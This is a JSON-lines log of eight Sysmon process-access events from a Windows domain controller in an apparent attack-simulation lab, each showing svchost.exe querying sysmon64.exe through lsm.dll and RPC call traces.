{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1571,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1572,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1573,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1574,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1575,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1576,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1577,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1578,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
